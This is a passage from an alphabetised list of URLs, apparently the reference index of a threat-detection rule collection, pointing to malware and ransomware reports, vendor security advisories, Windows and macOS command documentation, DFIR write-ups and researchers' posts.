SER/Keyboard-Layout/Preload/index\nhttps://reqrypt.org/windivert-doc.html\nhttps://res.armor.com/resources/threat-intelligence/astaroth-banking-trojan/\nhttps://research.checkpoint.com/2020/apache-guacamole-rce/\nhttps://research.checkpoint.com/2020/resolving-yo
ur-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/\nhttps://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/\nhttps://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/\nhttps://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/\nhttps://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/\nhttps://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/\nhttps://research.checkpoint.com/2023/queuejumper-critical-unauthorized-rce-vulnerability-in-msmq-service/\nhttps://research.checkpoint.com/2023/rorschach-a-new-sophisticated-and-fast-ransomware/\nhttps://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/\nhttps://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/\nhttps://research.eye.security/sharepoint-under-siege/\nhttps://research.kudelskisecurity.com/2023/06/12/cve-2023-27997-fortigate-ssl-vpn/\nhttps://research.nccgroup.com/2018/05/18/emissary-panda-a-potential-new-malicious-tool/\nhttps://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/\nhttps://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/\nhttps://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/\nhttps://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/\nhttps://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/\nhttps://research.nccgroup.com/2022/07/13/climbing-mount-everest-black-byte-bytes-back/\nhttps://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/\nhttps://research.splunk.com/cloud/c783dd98-c703-4252-9e8a-f19d9f5c949e/\nhttps://research.splunk.com/cloud/e155876a-6048-11eb-ae93
-0242ac130002/\nhttps://research.splunk.com/endpoint/07921114-6db4-4e2e-ae58-3ea8a52ae93f/\nhttps://research.splunk.com/endpoint/10399c1e-f51e-11eb-b920-acde48001122/\nhttps://research.splunk.com/endpoint/linux_doas_conf_file_creation/\nhttps://research.splunk.com/endpoint/linux_doas_tool_execution/\nhttps://research.splunk.com/endpoint/windows_possible_credential_dumping/\nhttps://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/\nhttps://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/\nhttps://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/\nhttps://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/\nhttps://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/\nhttps://restic.readthedocs.io/en/stable/030_preparing_a_new_repo.html\nhttps://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/\nhttps://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/\nhttps://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/\nhttps://rules.sonarsource.com/java/RSPEC-2755\nhttps://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/\nhttps://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/\nhttps://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/\nhttps://scriptingosx.com/2018/08/user-interaction-from-bash-scripts/\nhttps://sdmsoftware.com/general-stuff/launching-the-new-gp-management-editor-from-the-command-line/\nhttps://sec-consult.com/blog/detail/bumblebee-hunting-with-a-velociraptor/\nhttps://sec-consult.com/blog/detail/pentesters-windows-ntfs-tricks-collection/\nhttps://sec.cloudapps.cisco.com/security/center/content/Cisc
oSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z\nhttps://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection\nhttps://sec.okta.com/fastpassphishingdetection\nhttps://secariolabs.com/research/analysing-and-reproducing-poc-for-log4j-2-15-0\nhttps://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf\nhttps://seclists.org/fulldisclosure/2020/Mar/45\nhttps://seclists.org/fulldisclosure/2023/Jan/1\nhttps://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/\nhttps://securelist.com/apt-luminousmoth/103332/\nhttps://securelist.com/apt-slingshot/84312/\nhttps://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/\nhttps://securelist.com/chafer-used-remexi-malware/89538/\nhttps://securelist.com/defttorero-tactics-techniques-and-procedures/107610/\nhttps://securelist.com/faq-the-projectsauron-apt/75533/\nhttps://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/\nhttps://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/\nhttps://securelist.com/lazarus-on-the-hunt-for-big-game/97757/\nhttps://securelist.com/locked-out/68960/\nhttps://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/\nhttps://securelist.com/muddywater/88059/\nhttps://securelist.com/my-name-is-dtrack/93338/\nhttps://securelist.com/network-tunneling-with-qemu/111803/\nhttps://securelist.com/operation-triangulation/109842/\nhttps://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831\nhttps://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/\nhttps://securelist.com/schroedingers-petya/78870/\nhttps://securelist.com/the-epic-turla-operation/65545/\nhttps://securelist.com/the-tetrade-brazilian-banking-malware/97779/\nhttps://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/\nhttps://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/\nhttps://securingtomorrow.mca
fee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/\nhttps://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/\nhttps://security.padok.fr/en/blog/kubernetes-webhook-attackers\nhttps://security.paloaltonetworks.com/CVE-2024-3400\nhttps://security.stackexchange.com/questions/210843/is-it-possible-to-change-original-filename-of-an-exe\nhttps://securityaffairs.co/wordpress/133680/malware/dll-sideloading-spread-qakbot.html\nhttps://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/\nhttps://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/\nhttps://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2\nhttps://securitycafe.ro/2022/12/14/aws-enumeration-part-ii-practical-enumeration/\nhttps://securitydatasets.com/notebooks/atomic/windows/credential_access/SDWIN-201020013208.html\nhttps://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-201017061100.html\nhttps://securitydatasets.com/notebooks/atomic/windows/lateral_movement/SDWIN-200806015757.html?highlight=create%20file\nhttps://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/\nhttps://securityintelligence.com/x-force/x-force-hive0129-targeting-financial-institutions-latam-banking-trojan/\nhttps://securityjosh.github.io/2020/04/23/Mute-Sysmon.html\nhttps://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain\nhttps://securityliterate.com/how-malware-abuses-the-zone-identifier-to-circumvent-detection-and-analysis/\nhttps://securityscorecard.com/research/deep-dive-into-alphv-blackcat-ransomware\nhttps://securityxploded.com/\nhttps://sensepost.com/blog/2022/abusing-windows-tokens-to-compromise-active-directory-without-touching-lsass/\nhttps://sensepost.com/blog/2024/dumping-lsa-secrets-a-story-about-task-decorrelation/\nhttps://sergiusechel.medium.co
m/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468\nhttps://services.google.com/fh/files/blogs/gcat_threathorizons_full_apr2023.pdf\nhttps://shellgeek.com/useraccountcontrol-flags-to-manipulate-properties/\nhttps://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr\nhttps://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx\nhttps://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/\nhttps://sourceforge.net/projects/mouselock/\nhttps://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44\nhttps://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=49\nhttps://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53\nhttps://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=58\nhttps://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=7\nhttps://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70\nhttps://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=74\nhttps://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=76\nhttps://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=79\nhttps://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=8\nhttps://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse\nhttps://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=26\nhttps://speakerdeck.com/heirhabarov/hunting-for-powershell-a
buse?slide=41\nhttps://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42\nhttps://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43\nhttps://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=46\nhttps://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=50\nhttps://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57\nhttps://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=64\nhttps://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65\nhttps://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=66\nhttps://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\nhttps://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43\nhttps://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf\nhttps://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html\nhttps://squiblydoo.blog/2023/11/07/october-2023-solarmarker/\nhttps://ss64.com/bash/rar.html\nhttps://ss64.com/mac/chflags.html\nhttps://ss64.com/mac/hdiutil.html\nhttps://ss64.com/mac/system_profiler.html\nhttps://ss64.com/nt/cmd.html\nhttps://ss64.com/nt/dsacls.html\nhttps://ss64.com/nt/for.html\nhttps://ss64.com/nt/logman.html\nhttps://ss64.com/nt/mklink.html\nhttps://ss64.com/nt/net-service.html\nhttps://ss64.com/nt/netsh.html\nhttps://ss64.com/nt/regsvr32.html\nhttps://ss64.com/nt/shell.html\nhttps://ss64.com/nt/syntax-redirection.html\nhttps://ss64.com/osx/csrutil.html\nhttps://ss64.com/osx/dscl.html\nhttps://ss64.com/osx/dseditgroup.html\nhttps://ss64.com/osx/dsenableroot.html\nhttps://ss64.com/osx/osacompile.html\nhttps://ss64.com/osx/sysadminctl.html\nhttps://ss64.com/ps/foreach-object.html\nhttps://ssd-disclosure.com/ssd-advisory-common-log-file-system-clfs-driver-pe/\nhttps://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker\nhttps://stackoverflow.com/questions/258
92194/does-rails-come-with-a-not-authorized-exception\nhttps://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp\nhttps://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/\nhttps://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation\nhttps://steemit.com/utopian-io/@ah101/uac-bypassing-utility\nhttps://stefanos.cloud/blog/kb/how-to-clear-the-powershell-command-history/\nhttps://steflan-security.com/windows-privilege-escalation-credential-harvesting/\nhttps://streamable.com/q2dsji\nhttps://strontic.github.io/xcyclopedia/library/aclui.dll-F883E9CA757B622B032FDCA5BF33D0DF.html\nhttps://strontic.github.io/xcyclopedia/library/clsid_C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6.html\nhttps://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html\nhttps://strontic.github.io/xcyclopedia/library/dialer.exe-0B69655F912619756C704A0BF716B61F.html\nhttps://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html\nhttps://strontic.github.io/xcyclopedia/library/ldifde.exe-979DE101F5059CEC1D2C56967CA2BAC0.html\nhttps://strontic.github.io/xcyclopedia/library/mode.com-59D1ED51ACB8C3D50F1306FD75F20E99.html\nhttps://strontic.github.io/xcyclopedia/library/more.com-EDB3046610020EE614B5B81B0439895E.html\nhttps://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html\nhttps://strontic.github.io/xcyclopedia/library/setres.exe-0E30E4C09637D7A128A37B59A3BC4D09.html\nhttps://strontic.github.io/xcyclopedia/library/shell32.dll-65DA072F25DE83D9F83653E3FEA3644D.html\nhttps://strontic.github.io/xcyclopedia/library/stordiag.exe-1F08FC87C373673944F6A7E8B18CD845.html\nhttps://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf\nhttps://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html\nhttps://superuser.com/questions/150675/how-to-display-password-policy-inf
ormation-for-a-user-ubuntu\nhttps://support.anydesk.com/Automatic_Deployment\nhttps://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web\nhttps://support.atlassian.com/security-and-access-policies/docs/export-user-accounts\nhttps://support.citrix.com/article/CTX267027\nhttps://support.citrix.com/article/CTX267679\nhttps://support.citrix.com/article/CTX276688\nhttps://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967\nhttps://support.f5.com/csp/article/K52145254\nhttps://support.google.com/a/answer/9261439\nhttps://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc\nhttps://support.microsoft.com/en-us/topic/how-to-control-the-rule-actions-to-start-an-application-or-run-a-macro-in-outlook-2016-and-outlook-2013-e4964b72-173c-959d-5d7b-ead562979048\nhttps://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738\nhttps://support.microsoft.com/en-us/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16\nhttps://support.microsoft.com/en-us/topic/kb5021131-how-to-manage-the-kerberos-protocol-changes-related-to-cve-2022-37966-fd837ac3-cdec-4e76-a6ec-86e67501407d\nhttps://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649\nhttps://support.microsoft.com/en-us/topic/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04?ui=en-us&rs=en-us&ad=us\nhttps://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7\nhttps://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776\nhttps
://support.solarwinds.com/SuccessCenter/s/article/Configure-ESXi-Syslog-to-LEM?language=en_US\nhttps://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html\nhttps://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575\nhttps://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b\nhttps://swarm.ptsecurity.com/unauth-rce-vmware\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue\nhttps://symantec-enterprise-blogs.security.com/threat-intelligence/harvester-new-apt-attacks-asia\nhttps://sysd
ig.com/blog/mitre-defense-evasion-falco\nhttps://systeminformer.sourceforge.io/\nhttps://t.co/ezOTGy1a1G\nhttps://taggart-tech.com/quasar-electron/\nhttps://taiwan.postsen.com/business/88601/Hamas-hackers-use-data-destruction-software-BiBi-which-consumes-a-lot-of-processor-resources-to-wipe-Windows-computer-data--iThome.html\nhttps://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html\nhttps://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma\nhttps://teamhydra.blog/2020/08/25/bypassing-credential-guard/\nhttps://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088\nhttps://techcommunity.microsoft.com/t5/microsoft-365-blog/new-security-hardening-policies-for-trusted-documents/ba-p/3023465\nhttps://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726\nhttps://techcommunity.microsoft.com/t5/microsoft-entra-blog/introducing-windows-local-administrator-password-solution-with/ba-p/1942487\nhttps://techcommunity.microsoft.com/t5/microsoft-sentinel-blog/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\nhttps://techcommunity.microsoft.com/t5/sysinternals-blog/zoomit-v7-1-procdump-2-0-for-linux-process-explorer-v17-05/ba-p/3884766\nhttps://techcommunity.microsoft.com/t5/windows-it-pro-blog/tls-1-0-and-tls-1-1-soon-to-be-disabled-in-windows/ba-p/3887947\nhttps://techgenix.com/malicious-powershell-scripts-evade-detection/\nhttps://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx\nhttps://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx\nhttps://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx\nhttps://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx\nhttps://technet.microsoft.com/en-us/library/security/4022344\nhttps://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/\nhttps://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.
html\nhttps://thecyberexpress.com/ukraine-hit-by-meshagent-malware-campaign/\nhttps://thedfirreport.com/2020/04/20/sqlserver-or-the-miner-in-the-basement/\nhttps://thedfirreport.com/2020/05/08/adfind-recon/\nhttps://thedfirreport.com/2020/06/21/snatch-ransomware/\nhttps://thedfirreport.com/2020/10/08/ryuks-return\nhttps://thedfirreport.com/2020/10/08/ryuks-return/\nhttps://thedfirreport.com/2020/10/18/ryuk-in-5-hours/\nhttps://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/\nhttps://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/\nhttps://thedfirreport.com/2021/01/18/all-that-for-a-coinminer\nhttps://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware\nhttps://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\nhttps://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/\nhttps://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/\nhttps://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/\nhttps://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/\nhttps://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\nhttps://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/\nhttps://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\nhttps://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\nhttps://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/\nhttps://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/\nhttps://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/\nhttps://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/\nhttps://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\nhttps://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/\nhttps://thedfirreport.c
om/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/\nhttps://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\nhttps://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\nhttps://thedfirreport.com/2022/09/26/bumblebee-round-two/\nhttps://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/\nhttps://thedfirreport.com/2022/11/14/bumblebee-zeros-in-on-meterpreter/\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\nhttps://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\nhttps://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/\nhttps://thedfirreport.com/2023/03/06/2022-year-in-review/\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\nhttps://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/\nhttps://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/\nhttps://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/#detections\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\nhttps://thedfirreport.com/2025/06/30/hide-your-rdp-password-spray-leads-to-ransomhub-deployment/\nhttps://thehackernews.com/2023/10/experts-warn-of-severe-flaws-affecting.html\nhttps://thehackernews.com/2024/01/systembc-malwares-c2-server-analysis.html\nhttps://thehackernews.com/2024/03/github-rolls-out-default-secret.html\nhttps://thehackernews.com/2024/03/two-chinese-apt-groups-ramp-up-cyber.html\nhttps://thehackernews.com/2024/12/cisa-and-fbi-raise-alerts-on-exploited.html\nhttps://thehackernews.com/2025/03/unpatched-windows-zero-day-flaw.html\nhttps://therecord.media/cisa-warns-of-zoho-server-zero-day-exploited-in-the-wild/\nhttps://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/\nhttps://thewover.github.io/Introducing-Donut/\nhttps://
threadreaderapp.com/thread/1533879688141086720.html\nhttps://threathunterplaybook.com/hunts/windows/170105-LSASSMemoryReadAccess/notebook.html\nhttps://threathunterplaybook.com/hunts/windows/180719-DLLProcessInjectionCreateRemoteThread/notebook.html\nhttps://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html\nhttps://threathunterplaybook.com/hunts/windows/190101-ADModDirectoryReplication/notebook.html\nhttps://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html\nhttps://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html\nhttps://threathunterplaybook.com/hunts/windows/190510-RegModWDigestDowngrade/notebook.html\nhttps://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html\nhttps://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html\nhttps://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html\nhttps://threathunterplaybook.com/hunts/windows/190625-RegKeyAccessSyskey/notebook.html\nhttps://threathunterplaybook.com/hunts/windows/190725-SAMRegistryHiveHandleRequest/notebook.html\nhttps://threathunterplaybook.com/hunts/windows/190811-WMIModuleLoad/notebook.html\nhttps://threathunterplaybook.com/hunts/windows/190815-RemoteServiceInstallation/notebook.html\nhttps://threathunterplaybook.com/hunts/windows/190826-RemoteSCMHandle/notebook.html\nhttps://threathunterplaybook.com/hunts/windows/200902-RemoteWMIActiveScriptEventConsumers/notebook.html\nhttps://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html\nhttps://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html\nhttps://threathunterplaybook.com/library/windows/active_directory_replication.html\nhttps://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/\nhttps://threatpost.com/microsoft-petitpotam-poc/168163/\nhttps://threatresearch.ext.hp.com/svcrea
dy-a-new-loader-reveals-itself/\nhttps://tools.ietf.org/html/rfc2929#section-2.1\nhttps://tools.thehacker.recipes/mimikatz/modules\nhttps://tools.thehacker.recipes/mimikatz/modules/dpapi/credhist\nhttps://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021]\nhttps://tria.ge/220422-1nnmyagdf2/\nhttps://tria.ge/220422-1pw1pscfdl/\nhttps://tria.ge/231004-tp8k6sch9t/behavioral2\nhttps://tria.ge/240123-rapteaahhr/behavioral1\nhttps://tria.ge/240225-jlylpafb24/behavioral1/analog?main_event=Registry&op=SetValueKeyInt\nhttps://tria.ge/240226-fhbe7sdc39/behavioral1\nhttps://tria.ge/240301-rk34sagf5x/behavioral2\nhttps://tria.ge/240307-1hlldsfe7t/behavioral2/analog?main_event=Registry&op=SetValueKeyInt\nhttps://tria.ge/240521-ynezpagf56/behavioral1\nhttps://trustedsec.com/blog/adexplorer-on-engagements\nhttps://trustedsec.com/blog/oops-i-udld-it-again\nhttps://trustedsec.com/blog/specula-turning-outlook-into-a-c2-with-one-registry-change\nhttps://trustedsec.com/blog/wmi-for-script-kiddies\nhttps://twitter.com/0gtweet/status/1182516740955226112\nhttps://twitter.com/0gtweet/status/1206692239839289344\nhttps://twitter.com/0gtweet/status/1281103918693482496\nhttps://twitter.com/0gtweet/status/1299071304805560321?s=21\nhttps://twitter.com/0gtweet/status/1354766164166115331\nhttps://twitter.com/0gtweet/status/1359039665232306183?s=21\nhttps://twitter.com/0gtweet/status/1457676633809330184\nhttps://twitter.com/0gtweet/status/1465282548494487554\nhttps://twitter.com/0gtweet/status/1468548924600459267\nhttps://twitter.com/0gtweet/status/1474899714290208777?s=12\nhttps://twitter.com/0gtweet/status/1476286368385019906\nhttps://twitter.com/0gtweet/status/1477925112561209344\nhttps://twitter.com/0gtweet/status/1493963591745220608?s=20&t=xUg9DsZhJy1q9bPTUWgeIQ\nhttps://twitter.com/0gtweet/status/1526833181831200770\nhttps://twitter.com/0gtweet/status/1560732860935729152\nhttps://twitter.com/0gtweet/status/1564968845726580736\nhttps://twitter.com/0gtweet/status/1583356502340
870144\nhttps://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA\nhttps://twitter.com/0gtweet/status/1602644163824156672?s=20&t=kuxbUnZPltpvFPZdCrqPXA\nhttps://twitter.com/0gtweet/status/1628720819537936386\nhttps://twitter.com/0gtweet/status/1638069413717975046\nhttps://twitter.com/0gtweet/status/1666716511988330499\nhttps://twitter.com/0gtweet/status/1674399582162153472\nhttps://twitter.com/0gtweet/status/1720419490519752955\nhttps://twitter.com/0xBoku/status/1679200664013135872\nhttps://twitter.com/0xrawsec/status/1002478725605273600?s=21\nhttps://twitter.com/1kwpeter/status/1397816101455765504\nhttps://twitter.com/1ZRR4H/status/1534259727059787783\nhttps://twitter.com/1ZRR4H/status/1537501582727778304\nhttps://twitter.com/200_okay_/status/1194765831911215104\nhttps://twitter.com/_0xf4n9x_/status/1572052954538192901\nhttps://twitter.com/_dirkjan/status/1309214379003588608\nhttps://twitter.com/_felamos/status/1179811992841797632\nhttps://twitter.co